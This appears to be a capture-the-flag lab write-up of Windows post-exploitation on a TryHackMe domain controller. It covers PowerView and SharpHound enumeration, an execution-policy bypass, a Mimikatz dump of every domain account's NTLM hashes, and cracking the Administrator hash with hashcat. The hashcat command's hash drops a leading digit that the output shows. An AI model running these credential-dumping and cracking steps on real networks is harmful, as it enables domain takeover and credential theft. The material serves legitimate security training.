THM - Post Exploitation Basics
Introduction
This room will cover all of the basics of post-exploitation; we’ll talk everything from post-exploitation enumeration with PowerView and Bloodhunt, dumping hashes and golden ticket attacks with Mimikatz, basic information gathering using Windows Server tools and logs, and then we will wrap up this room talking abount the basics of maintaining access with persistence Metasploit module and creating a backdoor into the machine to get an instant meterpreter shell if the system is ever shutdown or reset.
Enumeration w/ Powerview
PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows “net *” commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality. PowerView can be used for enumerating a domain after you have already gained a shell in the system.
We are told to log into the machine through SSH or RDP with the credentials given in the task description. I’ll use SSH since I’m a lazy mf and I don’t want to install additional software.
$ ssh Administrator@10.10.169.239
We can see that the machine is a Windows machine and that the domain name is controller
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>
Start Powershell with
C:\Users\Administrator> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator>
-ep allow the current Powershell session to bypass the execution policy and to easily run scripts. Let’s assume we have already transfered PowerView inside the Download folder of the compromised machine. We can execute it with
PS C:\Users\Administrator> . .\Downloads\PowerView.ps1
We can now enumerate the domain users: all the users stored on a domain controller rather than the computer the user is logged into.
PS C:\Users\Administrator> Get-NetUser | select cn
cn
--
Administrator
Guest
krbtgt
Machine-1
Admin2
Machine-2
SQL Service
POST{REDACTED}
sshd
Enumerate the domain groups
PS C:\Users\Administrator> Get-NetGroup -GroupName *admin*
Administrators
Hyper-V Administrators
Storage Replica Administrators
Schema Admins
Enterprise Admins
Domain Admins
Key Admins
Enterprise Key Admins
DnsAdmins
Here some interesting cheatsheets with usefull commands
- https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
- https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview
Enumeration w/ Bloodhound
Bloodhound is a graphical interface that allows you to visually map out the network. This tool along with SharpHound which similar to PowerView takes the users, groups, trusts etc. of the network and collects them into .json files to be used inside of Bloodhound.
Bloodhound installation
Let’s assume we already have transfered SharpHound inside the compromised machine. We have to install in our machine Bloodhound
$ sudo apt-get install bloodhound
$ sudo neo4j console
We can now access neo4j console at http://localhost:7474 with the default credentials neo4j:neo4j.
Getting loot w/ SharpHound
Execute SharpHound with
PS C:\Users\Administrator> . .\Downloads\SharpHound.ps1
Let’s collect all the information available in the compromised host
PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
Dumping hashes w/ Mimikatz
Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of an active directory network.
We’ll be focusing on dumping the NTLM (NT Lan Manager) hashes with Mimikatz and then cracking those hashes using hashcat.
Dump Hashes w/ Mimikatz
Let’s run Mimikatz executable
C:\Users\Administrator> cd Downaloads && mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #18362 May 2 2020 16:23:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Make sure that Mimikatz is running as an administrator otherwise it’ll not run properly.
mimikatz # privilege::debug
Privilege '20' OK
Let’s dump the NTLM hashes with
mimikatz # lsadump::lsa /patch
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 5508500012cc005cf7082a9a89ebdfdf
RID : 0000044f (1103)
User : Machine1
LM :
NTLM : 64f12cddaa88057e06a81b54e73b949b
RID : 00000451 (1105)
User : Admin2
LM :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe
RID : 00000452 (1106)
User : Machine2
LM :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0
RID : 00000453 (1107)
User : SQLService
LM :
NTLM : f4ab68f27303bcb4024650d8fc5f973a
RID : 00000454 (1108)
User : POST
LM :
NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2
RID : 00000457 (1111)
User : sshd
LM :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
RID : 000003e8 (1000)
User : DOMAIN-CONTROLL$
LM :
NTLM : 15db3a3307f6f5bc574f9ec6832d1680
RID : 00000455 (1109)
User : DESKTOP-2$
LM :
NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c
RID : 00000456 (1110)
User : DESKTOP-1$
LM :
NTLM : 7d33346eeb11a4f12a6c201faaa0d89a
Crack those hashes w/ hashcat
Now we have to save one hash and try to crack it with hashcat. I’ll obviously crack the administrator one.
$ hashcat -m 1000 777b7fec870e04dda00cd7260f7bee6 /usr/share/wordlists/rockyou.txt
777b7fec870e04dda00cd7260f7bee6:P@$$W0rd
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: 2777b7fec870e04dda00cd7260f7bee6
Time.Started.....: Thu Sep 1 14:32:27 2022 (3 secs)
Time.Estimated...: Thu Sep 1 14:32:30 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3727.1 kH/s (0.23ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10762240/14344384 (75.03%)
Rejected.........: 0/10762240 (0.00%)
Restore.Point....: 10760192/14344384 (75.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: PAKITA&edin/LOVE -> P22880D
ET VOILÀ.